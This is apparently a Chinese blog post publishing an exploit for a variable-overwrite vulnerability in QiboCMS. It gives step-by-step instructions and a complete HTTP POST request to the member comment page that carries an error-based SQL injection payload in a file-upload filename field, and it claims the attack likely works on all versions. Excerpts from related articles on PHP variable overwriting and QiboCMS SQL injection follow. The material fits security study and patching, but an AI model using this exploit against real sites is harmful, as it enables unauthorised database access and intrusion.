齐博CMS变量覆盖漏洞exp



漏洞的具体分析在

http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13,下面公布一下我写的漏洞利用以及exp。

利用步骤如下:

(1)首先访问/member下面的“评论管理”功能,抓包

(2)在http request中构造一个attachment,如下:

POST /qibo/member/comment.php?job=yz&yz=0 HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 SE 2.X MetaSr 1.0
Referer: http://127.0.0.1/qibo/member/comment.php?job=work
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=jo9rpav7l51iakidv01vr9fem1;
passport=1%09admin%09ClAKVgsEBglUAwcFUgRTDgRRCF9XUAZXBAcAVQIHBlc%3D94606de1fd; USR=fvqnvbj3%0922%091425969668%09http%3A%2F%2F127.0.0.1%2Fqibo%2Fmember%2Fcomment.php%3Fjob%3Dwork
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary6ukpBHoIrpHKtOkl
Content-Length: 227

------WebKitFormBoundary6ukpBHoIrpHKtOkl
Content-Disposition: form-data; name="cidDB"; filename="1' and EXP(~(select * from(select user())a)) -- "
Content-Type: text/plain

1111
------WebKitFormBoundary6ukpBHoIrpHKtOkl--

注意将原来的URL上的cidDB[]=x删除掉;

然后构造一个文件上传的报文(GET改为POST方法);

在filename处填入注入的payload。

(3)提交该数据包,即可注入成功。

目测是全版本通杀的,这次的变量覆盖是抓住了extract的EXTR_SKIP只检查已经存在的变量,但是有些没有声明的变量还是会被覆盖。

时间: 2024-11-06 06:08:47

齐博CMS变量覆盖漏洞exp的相关文章

变量覆盖漏洞学习及在webshell中的运用

一.发生条件: 函数使用不当($$.extract().parse_str().import_request_variables()等) 开启全局变量 二.基础了解: 1.$$定义 $$代表可变变量,就是说,一个变量的变量名可以动态的设置和使用. 举个简单例子: 变量a被定义成了字符串hello 而变量$a被定于成了字符串world! 但同时$a本身也是个变量 $$a就可以代表两个含义$($a)和$(hello) 两个变量 此时输出的结果如图: 2.extract()定义 extract()可以

齐博cms最新SQL注入网站漏洞 可远程执行代码提权

齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢.开发架构使用的是php语言以及mysql数据库,强大的网站并发能力.于近日,我们SINE安全公司发现齐博cms又爆出高危的sql注入漏洞,关于该网站漏洞的详情,我们来详细的分析漏洞的产生以及如何利用. 在对整个网站代码的漏洞检测中发现do目录下的activate.php存在可以插入恶意参数的变量值,我们来看下这个代码: 齐博cms漏洞详

php之变量覆盖漏洞讲解

1.变量没有初始化的问题(1): wooyun连接1:[link href="WooYun: PHPCMS V9 member表内容随意修改漏洞"]tenzy[/link] $updateinfo['password'] = $newpassword;里面的数组没有初始化类似这样的赋值,我们在挖洞的时候搜索类似updateinfo这样的关键字看看 是否初始化,如果没有...且register_global=On支持 可以提交 updateinfo[amount]这样的数组随意修改自己的

7. 由一道ctf学习变量覆盖漏洞

0×00 背景 近期在研究学习变量覆盖漏洞的问题,于是就把之前学习的和近期看到的CTF题目中有关变量覆盖的题目结合下进一步研究. 通常将可以用自定义的参数值替换原有变量值的情况称为变量覆盖漏洞.经常导致变量覆盖漏洞场景有:$$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局变量注册等. 本篇收集了几个CTF中的题目作为例子,对$$,extract(),parse_str()的问题进行总结. 0×

【代码审计】变量覆盖漏洞详解

一.漏洞介绍 变量覆盖指的是用我们自定义的参数值替换程序原有的变量值,一般变量覆盖漏洞需要结合程序的其它功能来实现完整的攻击 二.漏洞函数 变量覆盖漏洞大多数由函数使用不当导致,经常引发变量覆盖漏洞的函数有:extract(),parse_str()和import_request_variables() 1.extract() 目前最常见的就是这个函数,使用频率最高,导致的漏洞也最多  extract(array,extract_rules,prefix)  参数 描述 array 必需.规定要

变量 覆盖漏洞----$$

变量覆盖漏洞经常引发变量覆盖漏洞的函数有:extract(),parsestr()和importrequestvariables()和$$(可变变量) $$可变变量引起的变量覆盖漏洞一.我们先来查看源代码进行分析1.Include 调用了flag.php文件2.$_200,$403 定义两个参数,以及参数值.3.接着是两个判断语句,判断访问页面的方法是否为post方法和有没有参数flag.4.再接着两个foreach函数遍历数组函数,这里就是把我们用get方法传输的数据当做数组进行遍历,并将遍历

变量覆盖漏洞----extract()函数

Extract()函数引起的变量覆盖漏洞 该函数使用数组键名作为变量名,使用数组键值作为变量值.但是当变量中有同名的元素时,该函数默认将原有的值给覆盖掉.这就造成了变量覆盖漏洞. 一.我们来查看一串代码:1.文件将get方法传输进来的值通过extrace()函数处理.2.通过两个if语句分别判断是否存在gift变量,和变量gift的值和变量content的值是否相等.变量content的值是通过读取变量test的值获取到的.如果两个变量相等输出flag.如果不相等,输出错误. 二.但是我们并不知

关于METINFO5.3漏洞引发的变量覆盖漏洞

一.$$引起的变量覆盖漏洞, 1.Include 调用了flag.php文件(调用文件还可以有require_once()或者require());2.$_200,$_403 定义两个参数,以及参数值.3.判断访问页面的方法是否为post方法和有没有参数flag.4.再接着两个foreach函数遍历数组函数,然后再将获取到的数组键名作为变量,数组中的键值作为变量的值.5.还有一个if判断语句,判断用post方法传输的数据是不是和$flag的值相同,如果相同,输出flag.6.最后输出$_200的

齐博CMS:最常用的一些变量名,方便二次开发.必须要熟悉的

ROOT_PATH程序所在硬盘目录的绝对地址,等同于以前的PHP168_PATH$webdb网站的全局变量,模块的全局变量也是这个$onlineip当前用户的IP$timestamp当前时间$WEBURL当前页面的URL $FROMURL在此之前的页面URL,也即来源页$web_admin是不是管理员,管理员的话为1,不是管理员的话为空 $lfjid当前登录用户的帐号$lfjuid当前登录用户的UID$lfjpwd当前登录用户的密码$lfjdb当前登录用户的全部资料信息数组如果没登录是游客的话,